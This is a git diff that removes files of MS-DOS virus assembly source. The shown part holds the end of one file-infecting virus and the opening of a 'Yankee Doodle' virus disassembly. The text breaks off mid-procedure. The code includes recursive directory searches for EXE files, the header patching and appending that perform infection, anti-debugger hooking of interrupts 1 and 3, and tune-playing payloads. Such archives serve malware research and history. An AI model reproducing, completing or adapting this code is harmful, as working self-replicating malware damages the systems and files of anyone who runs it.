stack - add dx,ax - pop ax - - mov si,offset buffer.SS_save - sub si,adjust ;Restore stack segment - add si,bx - mov cx,word ptr [si] - add cx,di - - push es - pop ds - - cli - mov ss,cx - sti - - - push dx - push ax - retf - - -search_exe PROC - - push si - push dx - call transfer_filespec ;transfer filename in another - ;working area - call find_first ;try to find a first match - jc not_here ;first match not found - call try_to_infect ;if found try to infect - ;infected != 0 if success - mov si,offset buffer.infected - sub si,adjust - add si,bx - test word ptr [si],0ffffh - jz try_next - jmp quiet_exit - -try_next: - call find_next ;If infection was not succesful - ;try once more - jc not_here - - call try_to_infect ;If match found try to infect - mov si,offset buffer.infected ;again - sub si,adjust - add si,bx - test word ptr [si],0ffffh - jz try_next - - jmp quiet_exit ;quiet exit simply jumps - ;to a return instruction -not_here: - pop dx ;If first searches are - push dx ;unsuccesful try a '*.*' match - call search_all - call find_first - jnc attribute_test ;i.e. expect probably to - ;find a subdirectory -quiet_exit: - pop dx - pop si - ret - -attribute_test: - mov si,dx ;offset of DTA - test byte ptr [si+015h],010h ;where attribute byte is to - ;be found.Try first with - ;subdirectory attribute - jne dir_found ;subdirectory found -more_tries: - call find_next ;Since the search was initiated - ;with '*.*' if this is not a - ;directory try to found one - jc quiet_exit ;No sense to search more - - test byte ptr [si+015h],010h - jz more_tries ;Search to the end -dir_found: - cmp byte ptr [si+01Eh],02Eh ;Compare with the subdirectory - ;mark '.' 
- jz more_tries ;looking for files no - ;subdirectories - - call dta_compute ;Valid entry, now set some DTA - ;and continue to search - push ax - mov ah,01Ah ;Set DTA function call - int 021h - pop ax - push si - mov si,offset buffer.infected - sub si,adjust - add si,bx - test word ptr [si],0ffffh - pop si - jnz quiet_exit - - jmp more_tries - - -search_exe ENDP - -dta_compute PROC - - push di ;Save some registers - push si - push ax - push bx - cld ;Up count for SI,DI pair - mov si,dx ;DTA address to SI - add si,01EH ;and add subdirectory - ;name offset - -store_loop: - lodsb - stosb - or al,al - jne store_loop ;store loop - - std - stosb - mov al,05Ch ;Put in place the path name - ;constructor - - stosb - add di,2 ;Adjust di for new searches - call search_exe ; - ;a heavily recursion - ; - pop bx ;some cleanup and exit - ; - pop ax - pop si - pop di - ret - -dta_compute ENDP - -try_to_infect PROC - - push ax - push bx - push cx - push dx - push si - push di - - push es - push bx - mov ax,2f00h ;Get DTA function call - int 21h - mov ax,bx - pop bx - mov si,offset buffer.pointer3 - sub si,adjust - add si,bx - mov [si],ax ;Offset saved - add si,2 - mov ax,es - mov [si],ax - pop es ;Segment located just above - - mov dx,offset buffer.new_data - sub dx,adjust - add dx,bx - push bx - mov ax,1a00h - int 21h ;Set DTA function call - pop bx ;It's very important to - ;save BX in all calls - - mov di,offset buffer.new_area - mov si,offset buffer.buffer1 - sub di,adjust - sub si,adjust - add di,bx - add si,bx - - cld ;Move previously found path- - ;name or filename to new - ;data area -move_path: - lodsb - stosb - or al,al - jnz move_path - std ;adjust DI to recieve - mov al,'\' ;filename. - mov cx,0040h - std ;Search backward - repne scasb - - mov si,offset buffer.pointer3 - sub si,adjust - add si,bx - mov ax,[si] - mov si,ax - add di,2 - -o_kay: - add si,001eh ;The beginning of the - ;filename... 
- cld ;Now move name - -move_fnm: - lodsb - stosb - or al,al - jnz move_fnm - - push dx - push bx - mov dx,offset buffer.new_area - sub dx,adjust - add dx,bx - mov ax,3d02h ;Open file with handle - ;for read/write - int 21h - pop bx - pop dx - jnc go_ahead ;In case file cannot be opened - jmp error_exit - -go_ahead: - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov [si],ax ;Save handle - - push bx - mov bx,ax ;Prepare for lseek - push dx - mov cx,0000h ;Look at the end of the file - mov dx,0000h ;Offset of -12 from the end - ;of the file - mov ax,4202h ;Lseek function call - int 21h - mov cx,dx - pop dx - pop bx - jnc compute_length - jmp close_error - -compute_length: - - sub ax,000ch - sbb cx,0000h ;Exact position - - -save_offset: ; - mov si,offset buffer.pointer5 - sub si,adjust - add si,bx - mov [si],ax - add si,2 - mov [si],cx - - push bx - push dx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] - mov dx,ax - mov ax,4200h ;From beginning of file - int 21h ;Lseek function call - pop dx - pop bx - jnc set_buffer - jmp close_error - -set_buffer: - push bx - push dx - mov dx,offset buffer.new_data - sub dx,adjust - add dx,bx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] ;Load handle - mov cx,000ch - mov ax,3f00h - int 21h ;Read function call - pop dx - pop bx - jnc read_ok - jmp close_error - -read_ok: - mov si,offset buffer.virus_stamp - mov di,offset buffer.new_data - sub si,adjust - sub di,adjust - add si,bx - add di,bx - mov cx,12 ;Length of strings to - ;compare - repe cmpsb - pushf - mov si,offset buffer.infected - sub si,adjust - add si,bx - mov word ptr [si],0000h - popf - jnz infect_it - -close_error: - mov si,offset buffer.handle - sub si,adjust - add si,bx - push bx - mov bx,[si] - mov ax,3e00h ;Close file function call - int 21h - pop bx - jmp error_exit - -infect_it: - mov si,offset buffer.infected - sub si,adjust - add si,bx - mov word ptr [si],7777h - - mov si,offset 
buffer.where_from_flag - sub si,adjust - add si,bx - mov ax,[si] - sub si,2 - mov [si],ax ;This code effectively moves - ;where_from_flag into help_flag - - add si,2 - mov [si],5a5ah ;Ready to infect - push bx - push dx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] - xor cx,cx - xor dx,dx - mov ax,4200h ;From beginning of file - int 21h ;Lseek function call - pop dx - pop bx - jnc set_new_data - jmp append_ok - -set_new_data: - push bx - push dx - mov dx,offset buffer.new_data - sub dx,adjust - add dx,bx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] ;Load handle - mov cx,001bh ;Read formatted exe header - mov ax,3f00h - int 21h ;Read function call - pop dx - pop bx - jnc read_header - jmp append_ok - -read_header: - nop ;some code to modify header - ; - - mov si,offset buffer.pointer5 - sub si,adjust - add si,bx - mov ax,[si] - add si,2 - add ax,0ch - adc word ptr [si],0000h - sub si,2 - mov [si],ax ;This code restores original - ;filelength - - mov si,offset buffer.new_data - sub si,adjust - add si,bx - mov ax,[si] - cmp ax,5a4dh ;check for valid exe file - jz valid_exe - jmp append_ok - -valid_exe: - mov ax,[si+8] ;Load module size - xor dx,dx - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 ;Multiply by 16 - - push ax - push dx ;Adjust new size - push cx - mov dx,virussize-896+64 - push dx - mov cx,0009h - shr dx,cl - add word ptr [si+4],dx - pop dx - and dx,01ffh - add dx,word ptr [si+2] - cmp dx,512 - jl adjust_okay - sub dx,512 - inc word ptr [si+4] -adjust_okay: - mov word ptr [si+2],dx - pop cx - pop dx - pop ax - - - push si ;This SI is very useful so save it - - mov si,offset buffer.pointer5 - sub si,adjust - add si,bx - sub [si],ax - mov ax,[si] - sbb [si+2],dx - mov dx,[si+2] ;the byte size of the load module - - - pop si - push ax - push dx - mov ax,[si+14h] - mov dx,[si+16h] ;Get CS:IP value - mov cx,[si+0eh] ;Get SS value - push si - mov si,offset 
buffer.IP_save - sub si,adjust - add si,bx - xchg [si],ax - xchg [si+2],dx - mov si,offset buffer.SS_save - sub si,adjust - add si,bx - xchg [si],cx - mov si,offset buffer.ip_old - sub si,adjust - add si,bx - mov [si],ax - mov [si+2],dx - mov si,offset buffer.ss_old - sub si,adjust - add si,bx - mov [si],cx - pop si - pop dx - pop ax - - push ax - push dx - - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 ;Multiply by 16 - - mov cx,0008h - shl dx,cl - mov cx,0004h - shr ax,cl ;A very obscure algorithm to make - ;a segment:offset pair - mov [si+14h],ax - mov [si+16h],dx ;Infected values - - push si - mov si,offset buffer.far_push - sub si,adjust - add si,bx - xchg [si],dx - mov word ptr [si+2],dx - pop si - - pop dx - pop ax - add ax,virussize ; - adc dx,0000h - - mov cx,0003h -mul_loop: - - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 - shl ax,1 - rcl dx,1 ;Multiply by 4096 - loop mul_loop - - or ax,ax - jz exact_value - inc dx -exact_value: - mov [si+0eh],dx ;Infected stack segment - - ;Write back infected header - push si - push bx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] - mov ax,5700h ;Get time function - int 21h - pop bx - pop si - jnc correct_time - jmp append_ok1 - -correct_time: - push cx - push bx - push dx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] - xor cx,cx - xor dx,dx - mov ax,4200h ;From beginning of file - int 21h ;Lseek function call - pop dx - pop bx - pop cx - jnc continue_infection - jmp append_ok1 - -continue_infection: - - push cx - push dx - push bx - mov dx,offset buffer.new_data - sub dx,adjust - add dx,bx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] ;Load handle - mov cx,001bh ;Write infected exe header - mov ax,4000h - int 21h ;Write function call - pop bx - pop dx - pop cx - jnc glue_virus - jmp append_ok1 - -glue_virus: - - push cx - push bx - push dx - mov si,offset buffer.handle - sub 
si,adjust - add si,bx - mov bx,[si] - xor cx,cx - xor dx,dx - mov ax,4202h ;From the end of file - int 21h ;Lseek function call - pop dx - pop bx - pop cx - jnc write_data - jmp append_ok1 - -write_data: - - mov si,offset buffer.handle - sub si,adjust - add si,bx - - push dx - push cx - - mov dx,bx - sub dx,3 ;The starting three byte - ;call instruction - push es - push bx - push dx - push si - mov ax,2f00h - int 21h - pop si - pop dx - - push es - push bx - - push si - mov ax,1a00h - int 21h - pop si - - - mov bx,[si] ;Load handle - mov cx,virussize-896+64 ;Length of virus obtained - mov ax,4000h ;with dir - int 21h - lahf ;Write function call - - pop bx - pop es - - push ds - push es - pop ds - mov dx,bx - push ax - mov ax,1a00h - int 21h - pop ax - - pop ds - pop bx - pop es - - pop cx - pop dx - - sahf - jnc put_stamp ;Error or not file - jmp append_ok1 ;is closed - -put_stamp: - push bx - mov si,offset buffer.handle - sub si,adjust - add si,bx - mov bx,[si] - mov ax,5701h ;Set time function - int 21h - pop bx - -append_ok1: - - mov si,offset buffer.ip_old ;Restore previous CS:IP values - sub si,adjust - add si,bx - mov ax,[si] - mov dx,[si+2] - mov si,offset buffer.IP_save - sub si,adjust - add si,bx - mov [si],ax - mov [si+2],dx - - mov si,offset buffer.save_push - sub si,adjust - add si,bx - mov ax,[si] - mov word ptr [si-2],ax - - mov si,offset buffer.ss_old - sub si,adjust - add si,bx - mov ax,[si] - mov si,offset buffer.SS_save - sub si,adjust - add si,bx - mov word ptr [si],ax - - -append_ok: - mov si,offset buffer.help_flag - sub si,adjust - add si,bx - mov ax,[si] - add si,2 - mov [si],ax ;This code effectively moves - ;help_flag into where_from_flag - - - jmp close_error ; - -error_exit: - mov si,offset buffer.pointer3 - sub si,adjust - add si,bx - mov dx,[si] ;Restore original DTA - add si,2 - mov ax,[si] - push ds - mov ds,ax - mov ax,1a00h ;Set DTA function call - int 21h - pop ds - pop di - pop si - pop dx - pop cx - pop bx - pop ax - ret - 
-try_to_infect ENDP - -transfer_filespec PROC - - push si - mov si,offset buffer.filematch ;Transfer name to the working - ;area - sub si,adjust - add si,bx - call byte_move - pop si - ret - -transfer_filespec ENDP - -search_all PROC - - push si - mov si,offset buffer.matchall ;This is the '*.*' filename - sub si,adjust - add si,bx - call byte_move - pop si - ret - -search_all ENDP - -byte_move PROC - - push ax - push di - - cld - -move_loop: - lodsb - stosb - or al,al ;The string to move is ASCIIZ - jne move_loop - pop di - pop ax - ret - -byte_move ENDP - -find_first PROC - - push cx - push bx - cmp dx,0000h - jnbe over_set - mov dx,offset buffer.buffer2 ;Set Data Transfer Area - sub dx,adjust ;or Disk Transfer area - add dx,bx ; -over_set: - add dx,02Bh - mov cx,00010h ;Attribute byte for - ;directory search - mov ah,01ah - int 021h ;Set DTA function call - - pop bx - push bx - push dx - mov dx,offset buffer.buffer1 - sub dx,adjust - add dx,bx - mov ah,04eh ;find first - ;function call - int 021h - pop dx - pop bx - pop cx - ret - -find_first ENDP - -find_next PROC - - push cx - push bx - push dx - mov dx,offset buffer.buffer1 - sub dx,adjust - add dx,bx - mov cx,00010h - mov ah,04fh ;Find next function call - int 021h - pop dx - pop bx - pop cx - ret - -find_next ENDP - -delay PROC - - push ax - push bx - push cx - push dx - mov ah,2ch ;Read current time - int 21h - - mov ah,ch - add al,cl - add bh,dh - add bl,dl - - cmp bl,100 - jb secs - sub bl,100 - inc bh -secs: cmp bh,60 - jb mins - sub bh,60 - inc al -mins: cmp al,60 - jb hours - sub al,60 - inc ah -hours: cmp ah,24 - jne tcheck - sub ah,ah - -tcheck: push ax - mov ah,2ch - int 21h - - pop ax - cmp cx,ax - ja tdquit - jb tcheck - cmp dx,bx - jb tcheck - -tdquit: pop dx - pop cx - pop bx - pop ax - ret - -delay ENDP - -sound PROC - - push ax - push cx - push dx - push di - - mov al,0b6h - out 43h,al - mov dx,14h - mov ax,533h*896 - div di - out 42h,al - mov al,ah - out 42h,al - in al,61h - mov ah,al - or 
al,3 - out 61h,al - mov al,cl - call delay - mov al,ah - out 61h,al - pop di - pop dx - pop cx - pop ax - ret - -sound ENDP - -music_play PROC - - push bx - push cx - push di - push si - push bp - -freq: - - mov di,[si] - cmp di,0ffffh - je end_play - mov bl,ds:[bp] - sub cl,cl - sub bh,bh - call sound - add si,2 - inc bp - jnz freq - -end_play: - pop bp - pop si - pop di - pop cx - pop bx - ret - -music_play ENDP - -mary_proc PROC - - push bx - push bp - - mov si,offset mary_freq - mov bp,offset mary_time - sub si,adjust - sub bp,adjust - add si,bx - add bp,bx - call music_play - - pop bp - pop bx - ret - -mary_proc ENDP - -mary_freq dw 262,262,293,329,262,329,293,196 - dw 262,262,293,329,262,262 - dw 262,262,293,329,349,329,293,262 - dw 246,196,220,246,262,262 - dw 220,246,220,174,220,246,262,220 - dw 196,220,196,174,164,174,196 - dw 220,246,220,174,220,246,262,220 - dw 196,262,246,293,262,262,0ffffh - - -mary_time db 8 dup(25) - db 4 dup(25), 50, 50 - db 8 dup(25) - db 4 dup(25), 50, 50 - db 26, 25, 26, 5 dup(25) - db 26, 25, 26, 3 dup(25), 30 - db 26, 25, 26, 4 dup(25), 30 - db 4 dup(25), 50, 50 - - - -setup_data: - cli - pop bx ;This will catch instruction pointer - push bx - sti ;value and after that restore stack - ret ;pointer value - - -buffer data_area <> ;Reseve data_area space - - - END start \ No newline at end of file diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yd23.asm b/MSDOS/Y-Index/Virus.MSDOS.Unknown.yd23.asm deleted file mode 100644 index 38e815ba..00000000 --- a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yd23.asm +++ /dev/null 
@@ -1,1818 +0,0 @@ -;THE YANKEE DOODLE VIRUS -;POOR DISASSEMBLY OF IT MANY REFRENCE MADE AS ABSOLUTE WHEN THEY SHOULD -;BE REFRENCE TO LOCATIONS IN PROGRAM -;WILL WORK IF NO CHANGES MADE TO CODE -;EXCUSE SOME OF THE COMMENTS WHICH MAKE NO SENSE - .RADIX 16 -INT01_OFFS EQU 0004 - -INT03_OFFS EQU 000C - -MEM_SIZE EQU 0413 -TIMER_HI EQU 006E -TIMER_LO EQU 006C - - -;****************************************************************************** -;The host program starts here. This one is a dummy that just returns control -;to DOS. -host_code SEGMENT byte - ASSUME CS:host_code, ds:host_code - ORG 0 - db 1eh dup (0) -HOST: DB 0B8H, 00H, 4CH, 0CDH - DB '!OS SYS' - DB 7,0,0,0,0 - -host_code ENDS - - - - -vgroup GROUP virus_code -virus_code SEGMENT byte - ASSUME cs:virus_code, ds:virus_code - - - -;data AREA - -TOP_VIR: db 0f4h - db 7ah - DB 2Ch ;used as a marker - -D003 DB 00 - -FSIZE1 DW 0000 ;filsize being infected -FSIZE2 DW 0223 ;in bytes hex of course - -D1 Dw 0abeh ;used as a marker - -TOP_HOST DW 5A4DH ;USED AS A FILE BUFFER - ;WHEN FILE IS EXE BELOW IS TRUE - ;SIGANATURE -P_SIZE DW 0023 ;LAST PAGE SIZE -P_COUNT DW 0002 ;PAGE COUNT -RELOC DW 0000 ;RELOC TABEL ENTRIES -H_PARA DW 0020 ;#HEADER PARAGRAPHS -MINALLOC DW 0001 ;MIN ALLOC OF MEM -MAXALLOC DW 0FFFF ;MAX ALLOC OF MEM -I_SS DW 0000 ;INTIAL SS -I_SP DW 0000 ;INTIAL SP -CHECKSUM DW 0000 ;CHECKSUM -I_IP DW 0000 ;I_IP PRE INFECTION -I_CS DW 0000 ;I_CS -REL_OFFSET DW 003E ;RELOCATION OFFSET -O_NUM DW 0000 ;OVERLAY NUM - ;EXTRA NOT USED DURING EXE - ;HEADER READING -REM1 DB 01,00,0FBH,30 ;D0026 -;end of top_host buffer -;*********************************************************************** - -OLD_INT21_OFS DW 109E -OLD_INT21_SEG DW 0116 - -OLD_INT21_OFS2 DW 109E -OLD_INT21_SEG2 DW 0116 - -OLD_INT24_OFS DW 0155 -OLD_INT24_SEG DW 048Ah - -OLD_INT1C_OFS DW 0FF53 -OLD_INT1C_SEG DW 0F000 - -F_HANDLE DW 5 ;3A -F_TIME DW 5002 ; -F_DATE DW 1ACC ;3E - -;USED IN VIT INT 1C PART - -X1 DW 00DE ;0040 -X2 DW 006A ;0042 - 
-BUFFER1 DB 2E,83,3E,5E,0C -BUFFER1A DB 0F4,06,70,00 - -BUFFER2 DB 2E,83,3E,5E,0C -BUFFER2A DB 0F4,06,70,00 - -SNARE DB 00 ;0056 - -X4 DB 00 - -F_ATTR DB 20 - -PLAY_TUNE DB 01 ;0059 -REM2 DB 00 ;005A - -COMFILE DB 00 -INFEC_FL DB 00 - -CTRL_FLAG DB 00 ;5D -COUNTER DB 7BH ;5E -X7 DB 01 ;5F -X8 DW 00 ;60 - -PAGE_16 DW 0010 ; -HOST_IP DW 0100 ;FOR COM FILE INFECTIONS -EXE_PG_SIZE DW 0200 ; - -C_OFFSET_21 DW OFFSET CALL_INT21 ;2CFH - -X101 DB 0C7,11 -X10 DB 0C7,11 ; -X11 DB 0E6,0F ;006E -X12 DB 28,0E ;70 - DB 0C7,11 ;72 - DB 28,0E ;74 - DB 0E6,0F ;76 - DB 0C4,17 ;78 - - DB 0C7,11,0C7,11 ;7a - DB 0E6,0F ;7e - DB 28,0E,0C7,11 ;80 - DB 0C7,11,0C7,11 ;84 - DB 0C7,11,0E6,0F ;88 - DB 28, 0E, 59, 0Dh ;8c - DB 28,0E,0E6,0f ;90 - - - DB 0C7, 11, 0ef, 12 - DB 0C4,17 - DB 2C,15 - DB 0EF - DB 12,0C7 - DB 11,0C7 - DB 11,2C - DB 15,0EF,12 - DB 2C,15 - DB 0C5,1A - DB 2C,15 - DB 0EF - DB 012,0C7 - DB 011,2C - DB 015,0C4,17 - DB 02C,15 - DB 0C4,17 - DB 0C5,1A - DB 67 ;BA - DB 1C,0C5 - DB 1A,0C4 - DB 17 - DB 2C,15 - DB 0EF - DB 12,2C - DB 15,0C5,1A - DB 2C,15 - DB 0EF - DB 12,0C7 - DB 11,2C - DB 15,0C4,17 - DB 0C7,11,0EF,12 - DB 0E6,00FH - DB 0C7,11,0C7,11 - DB 0FF,0FF - DB 05,05,05 - DB 05,05,05 - DB 05,05,05 - DB 05,05,05 - DB 09,09 - DB 05,05,05 - DB 05,05,05 - DB 05,05,05 - DB 05,05,05 - DB 09,09 - DB 05,05,05 - DB 05,05,05 - DB 05,05,05 - DB 05,05,05 - DB 05,05,06 - DB 05,05,05 - DB 05,05,05 - DB 05,06,05 - DB 05,05,05 - DB 09,09 ;115 - -NEW_PONG: - DB 0FEh, 06h, 7Ah, 7Dh ;INC BYTE PTR [7D7A] 0117 - DB 0FEH, 06, 0FBH, 7Dh ;INC BYTE PTR [7DFB] - DB 74,05 ;JZ 0126 - DB 0EA,00,7C,00,00 ;JMP 0000:7C00 - DB 0FC ;CLD - DB 33,0C0 ;XOR AX,AX - DB 8E,0C0 ;MOV ES,AX - DB 0BE, 2Ah, 7Dh ;MOV SI,7D2A - DB 0BF, 4Ch, 00 ;MOV DI,004C - DB 0A5 ;MOVSW - DB 0A5 ;MOVSW - DB 26 ;ES: - DB 83, 06, 13, 04, 02 ;ADD WORD PTR [0413],+02 - DB 0EAh, 00, 7Ch, 00, 00 ;JMP 0000:7C00 0139 - - -;DATA ENDS - -;****************************************************************** -P_MIN_MAX_ALLOC PROC NEAR -;ENTRY SI = 
14H = OFFSET MINALLOC -; 16H = OFFSET MAXALLOC -;THIS PROCEDURE ALTERS THE GIVEN VALUES -;TO BE USEFULE TO THE VIRUS WHEN GOING TSR -;by editing the min and max memory requirments -;so that it doesn't need to release mem to go memory resident - - MOV AX,[SI] - SUB AX,0BBH - JB TOSMALL - - CMP AX,08 - NOP - JB TOSMALL - -EXIT_MIN_MAX: - MOV [SI],AX - RETN - -TOSMALL: - MOV AX,09 - JMP short EXIT_MIN_MAX - -P_MIN_MAX_ALLOC ENDP - -;************************************************************************* -HOOK_1_3 PROC NEAR -;CALLED BY SET_TO_HOOK1_3 -; ON ENTRY HAS DI = 44 BX= 4 -; DI = 4D BX= C -; DS = CS OF HERE BY VIR INT 1C - PUSH SI - PUSH DS - PUSH CX - - PUSH DS - POP ES ;ES POINTS HERE - - MOV DS,WORD PTR [X7 + 1] ;APPARENTLY = 0000 - ; - LDS SI,DWORD PTR [BX] ;loads DS:SI = DS:[bx] - ; - MOV WORD PTR ES:[DI+ 5],SI ; - MOV WORD PTR ES:[DI+ 7],DS ; - CMP BYTE PTR [SI],0CFH ; - JE EXIT_HOOK_1_3 ;J17D -;if we get this far hook by manliputaing the vector table -;si = vector for int1 or int3 -;int used by debug programs - - CLD - MOV CX,0005 - REPZ MOVSB - MOV BYTE PTR [SI-05],9A ;flag - MOV WORD PTR [SI-04],OFFSET anti_DEBUG ;a ip 01c3 - MOV WORD PTR [SI-02],CS ;a cs - -EXIT_HOOK_1_3: - POP CX - POP DS - POP SI - RETN -HOOK_1_3 ENDP - -;*************************************************** -SET_TO_HOOK1_3 PROC NEAR -;CALLED BY VIR INT 1CH - - PUSH BX - PUSH DI - - MOV BX,INT01_OFFS ;0004 VECTOR TO INT3 - MOV DI,OFFSET BUFFER1 ;0044 - CALL HOOK_1_3 ;SET UP HOOK INT 1 - - MOV BX,INT03_OFFS ;000C VECTOR TO INT3 - MOV DI,OFFSET BUFFER2 ;004D - CALL HOOK_1_3 ;SET UP TO HOOK INT 3 - - POP DI - POP BX - RET - -SET_TO_HOOK1_3 ENDP -;************************************************************************* - -RESTORE_1_3 PROC NEAR -;ENTRY SI = BUFFER1 ;2E,83,3E,5E,0C F4,06,70,00 -; BUFFER2 -;NOT SURE WHY BUT IT SEEMS THAT THIS CODE WILL CHECK FOR MEM LOCATION -; 0070:60F4 = 9A,01,C3 IF THERE IT WILL -;RESTORE OF BUFFER1/2 OVER THIS LOCATION WHICH WAS THE ORGINAL -; VECTOR 
ADDRESS INT - - PUSH CX - PUSH DI - - LES DI,DWORD PTR [SI+05] ;load this 4 bytes as a mem - ;location into es:di - ;0070:06f4 - CMP BYTE PTR ES:[DI],9A - JNE EXIT_RESTORE_1_3 - - CMP WORD PTR ES:[DI+01],OFFSET anti_DEBUG - JNE EXIT_RESTORE_1_3 - - MOV CX,5 ; MOV 5 BYTES - CLD ; FROM DS:[SI] - REPZ MOVSB ; HERE:[BUFFERX] - ; TO ES:[DI] - ; 0070:06F4 -EXIT_RESTORE_1_3: - POP DI - POP CX - RETN -RESTORE_1_3 ENDP - -;************************************************************* - -SET_TO_REST_1_3 PROC -;THIS PROCEDURE SEEMS TO RESTORE THE THE INT 1 AND 3 TO THERE PROPER -;LOCATIONS IF WE HAVE ALTERED THEM IT CHECK AND CORRECTS THEM -;IN RESTORE_1_3 -;CALLED BY VIR INT 1C - - PUSH SI - MOV SI,OFFSET BUFFER2 - CALL RESTORE_1_3 - - MOV SI,OFFSET BUFFER1 - CALL RESTORE_1_3 - - POP SI - RETN -SET_TO_REST_1_3 ENDP - -;********************************************************************** -;J01C3 -;called int 1\ used by debuggers not program is disenfected if -; int 3/ resident and td or debug is used -; BY PUTTING IN TO THE INT VECTOR FOR INT 1 OR AND INT 3 -;THE ADDRESS OF THIS SPOT -;BY HOOK_1_3 -; - -anti_DEBUG PROC ; P_01C3 - ; A - PUSH BP ; 8 - MOV BP,SP ; FLAGS 6 - PUSHF ; CS 4 - ; IP 2 - PUSH ES ; BP <-BP - PUSH DS - - PUSH BX - PUSH AX - - PUSH CS - pop DS - - CALL SET_TO_REST_1_3 ;RESTORE PROPER VECTORS - ;IF ALTERED WHICH TO GET HERE IT - ;ONE OF THEM WOULD HAVE HAD TO BEEN - - MOV AX,CS ;this test if the calling - CMP WORD PTR [BP+08],AX ;return to from this is - JE viral_cs ;J020C is our cs - - MOV DS,WORD PTR [BP+08] - CMP WORD PTR [BX+OFFSET TOP_VIR+2],2C ; THIS INFO IS LOCATED AT TOP - JNE EXIT_TO_VIR ; OF VIRUS AND MAYBE AT END AS - ; END AS WELL - CMP WORD PTR [BX+OFFSET TOP_VIR],7AF4 ; - JNE EXIT_TO_VIR ; - - ;CMP WORD PTR [BX + 0008h],0ABE - db 81, 0bf, 08, 00, 0be, 0a - JNE EXIT_TO_VIR - - MOV AX,DS ; BX /16 BY {4 SHR} - SHR BX,1 ; WHAT WAS IN BX OFFSET OF VIRUS - SHR BX,1 ; BX APPEARS TO POINT TO - SHR BX,1 ; TOP VIRUS - SHR BX,1 ; CS + IP/16 = EA - ADD 
AX,BX ; - MOV DS,AX ;DS = SOM EFFECTIVE ADDRESS - JMP SHORT viral_cs ; - -EXIT_TO_VIR: ;J0201 - SUB WORD PTR [BP+02],05 - POP AX - POP BX - POP DS - POP ES - POPF - POP BP - RETF - -viral_cs: - CALL P_030E - - MOV AX,WORD PTR [BP+0A] - INC BYTE PTR [REM2] ;005A IF = 0A FLAGS - TEST AX,0100 ; 08 CS - JNZ J0222 ; 06 IP - DEC WORD PTR [BP+06] ; 4 - DEC byte PTR [REM2] ;005A 2 - ; BP -J0222: - AND AX,0FEFFH ; TURNS OFF IF FLAG - MOV [BP+0A],AX ; IF ON - - PUSH CS - POP DS - CALL SET_TO_HOOK1_3 ; THIS CALL SETS UP THE - ; INTERUPTS 1 AND 3 - ; TO GO HERE IF - ; THINGS MATCH - - POP AX - POP BX - POP DS - POP ES - POPF - POP BP - ADD SP,+04 ;REMOVE LAST 2 PUSH - IRET -anti_DEBUG ENDP -;************************************************************************ - -VIR_INT_1C PROC - - PUSH BP - MOV BP,SP - PUSHF - PUSH AX - PUSH BX - PUSH DS - PUSH ES - - PUSH CS - POP DS - - CALL SET_TO_REST_1_3 ;AGAIN RESTORES 1 AND 3 INT - ; TO PROPER LOCATIONS - ;IF NEED BE - - CALL SET_TO_HOOK1_3 ;ALTERS THE 1 AND 3 INT - ; TO OUR INT HANDLER - ;IF SOMETHING IS WRONG - - MOV AX,0040 - MOV ES,AX - TEST BYTE PTR [COUNTER],07 - JNE WRONG_TIME ;J0274 - -;NOTICE THAT THIS CMP INSTRUCTIONS ARE LOOKING AT 0040: - CMP WORD PTR ES:[TIMER_HI],11 ; - JNE WRONG_TIME ;J0274 - - CMP WORD PTR ES:[TIMER_LO],00 ; - JNE WRONG_TIME ;J0274 - - MOV BYTE PTR [PLAY_TUNE],00 - MOV WORD PTR [X1],00DE ;0040 - MOV WORD PTR [X2],006A ;0042 - -WRONG_TIME: ;J0274 - CMP BYTE PTR [PLAY_TUNE],1 ;01 MEANS NO - JE EXIT_VIR_1C ;J02C4 - - CMP BYTE PTR [X4],00 ; - JE J0288 - - DEC BYTE PTR [X4] - JMP SHORT EXIT_VIR_1C - -J0288: - MOV BX,[X2] - CMP WORD PTR [BX],0FFFFH - JNE J029E - - IN AL,61 - AND AL,0FC - OUT 61,AL - MOV BYTE PTR [PLAY_TUNE],01 - - JMP short EXIT_VIR_1C - - -J029E: - MOV AL,0B6 - OUT 43,AL - MOV AX,[BX] - OUT 42,AL - MOV AL,AH - OUT 42,AL - IN AL,61 - OR AL,03 - OUT 61,AL - ADD WORD PTR [X2],+02 - MOV BX,WORD PTR [X1] - MOV AL,[BX] - DEC AL - MOV BYTE PTR [X4],AL - INC WORD PTR [X1] - -EXIT_VIR_1C: - POP 
ES - POP DS - POP BX - POP AX - POPF - POP BP - JMP DWORD PTR CS:[OLD_INT1C_OFS] -VIR_INT_1C ENDP -;************************************************************* -CALL_INT21: JMP DWORD PTR CS:[OLD_INT21_OFS] - -REAL_INT21: JMP DWORD PTR [OLD_INT21_OFS] - -;************************************************************* -P_02D8 PROC NEAR -;CALLED BY HANDLE_4B - PUSH BP - MOV BP,SP - CLD - PUSH [BP+0AH] - PUSH [BP+08] - PUSH [BP+04] - CALL P_09C8 - - ADD SP,+06 ;REMOVE LAST 3 PUSHES - - PUSH [BP+0CH] - PUSH [BP+06] - PUSH [BP+08] - CALL P_0A58 - - ADD SP,+06 ;REMOVE LAST 3 PUSHES - - PUSH [BP+0CH] - PUSH [BP+08] - PUSH [BP+06] - PUSH [BP+04] - CALL P_0A7F - - ADD SP,+08 - POP BP - RETN -P_02D8 ENDP -;********************************************************************** - -P_030E PROC -;CALLED BY HANDLE_4B - -;CALLED BT VIR INT 1 INT3 IN HIGH MEM -;IN INT 3 1 CASE IT SEEMS -;THAT DX= EA 0F TOP OF VIRUS POSSIBLE -;TO RETURN 5 WORDS IN STACK TOP 3 = FL,CS,IP -;BOTTOM 2 ARE THROWN OUT - - PUSH AX - PUSH BX - PUSH CX - PUSH DX - PUSH SI - PUSH DI - PUSH ES - PUSHF - CLI ;CLEAR IF - - MOV AX,8 ; - PUSH AX 